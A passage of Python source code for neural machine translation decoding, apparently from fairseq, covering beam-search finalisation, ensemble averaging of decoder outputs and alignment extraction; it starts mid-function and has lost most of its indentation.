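        # Example of the packing: sent 3 and unfin_idx 1 pack to (3 << 32) + 1;
        # the loop below recovers sent via `>> 32` and unfin_idx via subtraction.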
unique_seen: List[int] = torch.unique(seen).tolist()
if self.match_source_len:
condition = step > torch.index_select(src_lengths, 0, unfin_idx)
eos_scores = torch.where(condition, torch.tensor(-math.inf), eos_scores)
sent_list: List[int] = sent.tolist()
for i in range(bbsz_idx.size()[0]):
# An input sentence (among those in a batch) is finished when
# beam_size hypotheses have been collected for it
if len(finalized[sent_list[i]]) < beam_size:
if attn_clone is not None:
# remove padding tokens from attn scores
hypo_attn = attn_clone[i]
else:
hypo_attn = torch.empty(0)
finalized[sent_list[i]].append(
{
"tokens": tokens_clone[i],
"score": eos_scores[i],
"attention": hypo_attn, # src_len x tgt_len
"alignment": torch.empty(0),
"positional_scores": pos_scores[i],
}
)
newly_finished: List[int] = []
for unique_s in unique_seen:
# check termination conditions for this sentence
unique_sent: int = unique_s >> 32
unique_unfin_idx: int = unique_s - (unique_sent << 32)
if not finished[unique_sent] and self.is_finished(
step, unique_unfin_idx, max_len, len(finalized[unique_sent]), beam_size
):
finished[unique_sent] = True
newly_finished.append(unique_unfin_idx)
return newly_finished
def is_finished(
self,
step: int,
unfin_idx: int,
max_len: int,
finalized_sent_len: int,
beam_size: int,
):
"""
        Check whether decoding for a sentence is finished, which
        occurs when the list of finalized hypotheses for that sentence
        has reached the beam size, or when we reach the maximum length.
"""
assert finalized_sent_len <= beam_size
if finalized_sent_len == beam_size or step == max_len:
return True
return False
class EnsembleModel(nn.Module):
"""A wrapper around an ensemble of models."""
def __init__(self, models):
super().__init__()
self.models_size = len(models)
        # ModuleList does not support '__len__' in TorchScript, so the size is cached above.
self.single_model = models[0]
self.models = nn.ModuleList(models)
self.has_incremental: bool = False
if all(
hasattr(m, "decoder") and isinstance(m.decoder, FairseqIncrementalDecoder)
for m in models
):
self.has_incremental = True
def forward(self):
pass
def has_encoder(self):
return hasattr(self.single_model, "encoder")
def has_incremental_states(self):
return self.has_incremental
def max_decoder_positions(self):
return min(
[
m.max_decoder_positions()
for m in self.models
if hasattr(m, "max_decoder_positions")
]
+ [sys.maxsize]
)
def set_decoder_beam_size(self, beam_size):
"""Set beam size for efficient beamable enc-dec attention."""
if beam_size > 1:
for model in self.models:
if hasattr(model, "set_beam_size"):
model.set_beam_size(beam_size)
@torch.jit.export
def forward_encoder(self, net_input: Dict[str, Tensor]):
if not self.has_encoder():
return None
return [model.encoder.forward_torchscript(net_input) for model in self.models]
@torch.jit.export
def forward_decoder(
self,
tokens,
encoder_outs: List[Dict[str, List[Tensor]]],
incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]],
temperature: float = 1.0,
):
log_probs = []
avg_attn: Optional[Tensor] = None
encoder_out: Optional[Dict[str, List[Tensor]]] = None
for i, model in enumerate(self.models):
if self.has_encoder():
encoder_out = encoder_outs[i]
# decode each model
if self.has_incremental_states():
decoder_out = model.decoder.forward(
tokens,
encoder_out=encoder_out,
incremental_state=incremental_states[i],
)
else:
if hasattr(model, "decoder"):
decoder_out = model.decoder.forward(tokens, encoder_out=encoder_out)
else:
decoder_out = model.forward(tokens)
attn: Optional[Tensor] = None
decoder_len = len(decoder_out)
if decoder_len > 1 and decoder_out[1] is not None:
if isinstance(decoder_out[1], Tensor):
attn = decoder_out[1]
else:
attn_holder = decoder_out[1]["attn"]
if isinstance(attn_holder, Tensor):
attn = attn_holder
elif attn_holder is not None:
attn = attn_holder[0]
if attn is not None:
attn = attn[:, -1, :]
decoder_out_tuple = (
decoder_out[0][:, -1:, :].div_(temperature),
None if decoder_len <= 1 else decoder_out[1],
)
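            # Apply temperature scaling to the last-step decoder outputs before
            # normalization: temperature > 1.0 flattens the distribution, < 1.0 sharpens it.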
probs = model.get_normalized_probs(
decoder_out_tuple, log_probs=True, sample=None
)
probs = probs[:, -1, :]
if self.models_size == 1:
return probs, attn
log_probs.append(probs)
if attn is not None:
if avg_attn is None:
avg_attn = attn
else:
avg_attn.add_(attn)
avg_probs = torch.logsumexp(torch.stack(log_probs, dim=0), dim=0) - math.log(
self.models_size
)
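        # logsumexp over models minus log(M) is the log of the arithmetic mean of the
        # per-model probabilities, computed in log space for numerical stability.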
if avg_attn is not None:
avg_attn.div_(self.models_size)
return avg_probs, avg_attn
@torch.jit.export
def reorder_encoder_out(
self, encoder_outs: Optional[List[Dict[str, List[Tensor]]]], new_order
):
"""
Reorder encoder output according to *new_order*.
Args:
encoder_out: output from the ``forward()`` method
new_order (LongTensor): desired order
Returns:
*encoder_out* rearranged according to *new_order*
"""
new_outs: List[Dict[str, List[Tensor]]] = []
if not self.has_encoder():
return new_outs
for i, model in enumerate(self.models):
assert encoder_outs is not None
new_outs.append(
model.encoder.reorder_encoder_out(encoder_outs[i], new_order)
)
return new_outs
@torch.jit.export
def reorder_incremental_state(
self,
incremental_states: List[Dict[str, Dict[str, Optional[Tensor]]]],
new_order,
):
if not self.has_incremental_states():
return
for i, model in enumerate(self.models):
model.decoder.reorder_incremental_state_scripting(
incremental_states[i], new_order
)
class SequenceGeneratorWithAlignment(SequenceGenerator):
def __init__(
self, models, tgt_dict, left_pad_target=False, print_alignment="hard", **kwargs
):
"""Generates translations of a given source sentence.
Produces alignments following "Jointly Learning to Align and
Translate with Transformer Models" (Garg et al., EMNLP 2019).
Args:
            left_pad_target (bool, optional): Whether the
                hypotheses should be left-padded when they are
                teacher-forced for generating alignments.
"""
super().__init__(EnsembleModelWithAlignment(models), tgt_dict, **kwargs)
self.left_pad_target = left_pad_target
if print_alignment == "hard":
self.extract_alignment = utils.extract_hard_alignment
elif print_alignment == "soft":
self.extract_alignment = utils.extract_soft_alignment
@torch.no_grad()
def generate(self, models, sample, **kwargs):
finalized = super()._generate(sample, **kwargs)
src_tokens = sample["net_input"]["src_tokens"]
bsz = src_tokens.shape[0]
beam_size = self.beam_size
(
src_tokens,
src_lengths,
prev_output_tokens,
tgt_tokens,
) = self._prepare_batch_for_alignment(sample, finalized)
if any(getattr(m, "full_context_alignment", False) for m in self.model.models):
attn = self.model.forward_align(src_tokens, src_lengths, prev_output_tokens)
else:
attn = [
finalized[i // beam_size][i % beam_size]["attention"].transpose(1, 0)
for i in range(bsz * beam_size)
]
if src_tokens.device != "cpu":
src_tokens = src_tokens.to("cpu")
tgt_tokens = tgt_tokens.to("cpu")
attn = [i.to("cpu") for i in attn]
# Process the attn matrix to extract hard alignments.
for i in range(bsz * beam_size):
alignment = self.extract_alignment(
attn[i], src_tokens[i], tgt_tokens[i], self.pad, self.eos
)
finalized[i // beam_size][i % beam_size]["alignment"] = alignment
return finalized
def _prepare_batch_for_alignment(self, sample, hypothesis):
src_tokens = sample["net_input"]["src_tokens"]
bsz = src_tokens.shape[0]
src_tokens = (
src_tokens[:, None, :]
.expand(-1, self.beam_size, -1)
.contiguous()
.view(bsz * self.beam_size, -1)
)
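        # Replicate each source sentence beam_size times so every finished hypothesis
        # can be teacher-forced against its own copy of the source.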
src_lengths = sample["net_input"]["src_lengths"]
src_lengths = (
src_lengths[:, None]
.expand(-1, self.beam_size)
.contiguous()
.view(bsz * self.beam_size)
)
prev_output_tokens = data_utils.collate_tokens(
[beam["tokens"] for example in hypothesis for beam in example],
self.pad,
self.eos,
self.left_pad_target,
move_eos_to_beginning=True,
)
tgt_tokens = data_utils.collate_tokens(
[beam["tokens"] for example in hypothesis for beam in example],
self.pad,
self.eos,
self.left_pad_target,
move_eos_to_beginning=False,
)
return src_tokens, src_lengths, prev_output_tokens, tgt_tokens
class EnsembleModelWithAlignment(EnsembleModel):
"""A wrapper around an ensemble of models."""
def __init__(self, models):
super().__init__(models)
def forward_align(self, src_tokens, src_lengths, prev_output_tokens):
avg_attn = None
for model in self.models:
decoder_out = model(src_tokens, src_lengths, prev_output_tokens)
attn = decoder_out[1]["attn"][0]
if avg_attn is None:
avg_attn = attn
else:
avg_attn.add_(attn)
if len(self.models) > 1:
avg_attn.div_(len(self.models))
return avg_attn